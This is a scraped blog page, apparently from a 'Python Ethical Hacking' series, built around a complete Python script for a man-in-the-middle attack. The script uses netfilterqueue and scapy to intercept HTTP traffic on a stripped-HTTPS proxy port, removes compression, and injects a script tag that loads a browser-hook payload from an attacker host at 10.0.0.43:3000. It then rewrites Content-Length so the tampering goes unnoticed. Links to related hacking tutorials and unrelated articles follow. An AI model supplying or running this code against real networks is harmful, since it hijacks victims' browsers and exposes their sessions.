Injecting Code in HTTPS Pages:

#!/usr/bin/env python

import re

from netfilterqueue import NetfilterQueue

from scapy.layers.inet import TCP, IP

from scapy.packet import Raw

def set_load(packet, load):

    packet[Raw].load = load

    del packet[IP].len

    del packet[IP].chksum

    del packet[TCP].chksum

    return packet

def process_packet(packet):

    scapy_packet = IP(packet.get_payload())

    if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):

        load = scapy_packet[Raw].load

        if scapy_packet[TCP].dport == 10000:

            print("[+] Request")

            print(scapy_packet.show())

            load = re.sub(b"Accept-Encoding:.*?\\r\\n", b"", load)

            load = load.replace("HTTP/1.1", "HTTP/1.0")

        elif scapy_packet[TCP].sport == 10000:

            print("[+] Response")

            injection_code = b'<script src="http://10.0.0.43:3000/hook.js"></script>'

            load = load.replace(b"</body>", injection_code + b"</body>")

            content_length_search = re.search(b"(?:Content-Length:\s)(\d*)", load)

            if content_length_search and b"text/html" in load:

                print(content_length_search)

                content_length = content_length_search.group(1)

                new_content_length = int(content_length) + len(injection_code)

                load = load.replace(content_length, str(new_content_length).encode())

        if load != scapy_packet[Raw].load:

            print("Payload")

            new_packet = set_load(scapy_packet, load)

            print(str(new_packet))

            packet.set_payload(str(new_packet).encode())

    packet.accept()

queue = NetfilterQueue()

queue.bind(0, process_packet)

try:

    queue.run()

except KeyboardInterrupt:

    print('')

Python Ethical Hacking - Bypass HTTPS(2)的更多相关文章

  1. Python Ethical Hacking - Bypass HTTPS(1)

    HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...

  2. Python Ethical Hacking - MAC Address & How to Change(1)

    MAC ADDRESS Media Access Control Permanent Physical Unique Assigned by manufacturer WHY CHANGE THE M ...

  3. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  4. Python Ethical Hacking - MAC Address & How to Change(3)

    SIMPLE ALGORITHM Goal  -> Check if MAC address was changed. Steps: 1. Execute and read ifconfig. ...

  5. Python Ethical Hacking - The Lab and Needed Software

    The Lab and Needed Software Attacker Machine - Kali Linux https://www.kali.org/ 1. Install the softw ...

  6. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(2)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  7. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(1)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  8. Python Ethical Hacking - DNS Spoofing

    What is DNS Spoofing Sniff the DNSRR packet and show on the terminal. #!/usr/bin/env python from net ...

  9. Python Ethical Hacking - Intercepting and Modifying Packets

    INTERCEPTING & MODIFYING PACKETS Scapy can be used to: Create packets. Analyze packets. Send/rec ...

随机推荐

  1. Windows程序设计(2) - API-02 文件系统

    一.磁盘分区的基本概念 1.磁盘分区(Patitions): 分区就是物理存储设备分割成多个不同的逻辑上的存储设备.分区从实质上说就是对硬盘的一种格式化.当我们创建分区时,就已经设置好了硬盘的各项物理 ...

  2. Java并发编程的本质是解决这三大问题

    [本文版权归微信公众号"代码艺术"(ID:onblog)所有,若是转载请务必保留本段原创声明,违者必究.若是文章有不足之处,欢迎关注微信公众号私信与我进行交流!] 前言 并发编程的 ...

  3. Linux下9种优秀的代码比对工具推荐

    大家好,我是良许. 在我们编写代码的时候,我们经常需要知道两个文件之间,或者同一个文件不同版本之间有什么差异性.在 Windows 下有个很强大的工具叫作 BeyondCompare ,那在 Linu ...

  4. 蝙蝠算法(BA)学习笔记

    算法原理 蝙蝠能够在夜间或十分昏暗的环境中自由飞翔和准确无误地捕捉食物,是因为他们能够从喉头发出地超声脉冲回声来定位.受这一启发,Yang教授在2010年提出了蝙蝠算法(Bat Algorithm,B ...

  5. DOM-BOM-EVENT(3)

    3.Node常用属性 childNodes 获取所有子节点 <div id="wrap"> <div>1111</div> <div> ...

  6. asp.net 修饰符介绍(关于public、private、protected、internal)

    1.private修饰符 private修饰符用于设置类或类成员的访问权限仅为所属类的内部,private也被称为私有修饰符.某些时候需要访问私有类成员时,可通过get和set访问器读取或修改. 2. ...

  7. SpringBoot2.x入门:快速创建一个SpringBoot应用

    前提 这篇文章是<SpringBoot2.x入门>专辑的第2篇文章,使用的SpringBoot版本为2.3.1.RELEASE,JDK版本为1.8. 常规的套路会建议使用Spring官方提 ...

  8. Spring中AOP相关的API及源码解析

    Spring中AOP相关的API及源码解析 本系列文章: 读源码,我们可以从第一行读起 你知道Spring是怎么解析配置类的吗? 配置类为什么要添加@Configuration注解? 谈谈Spring ...

  9. JVM源码分析之synchronized实现

    “365篇原创计划”第十二篇.   今天呢!灯塔君跟大家讲:   JVM源码分析之synchronized实现     java内部锁synchronized的出现,为多线程的并发执行提供了一个稳定的 ...

  10. suprious weakup

    线程wait情况下,有可能没有中断,没有唤醒,而返回, 称为spurious wakeup. wait在循环中,通过对condition的判断来决定是否继续wait. 概率比较低.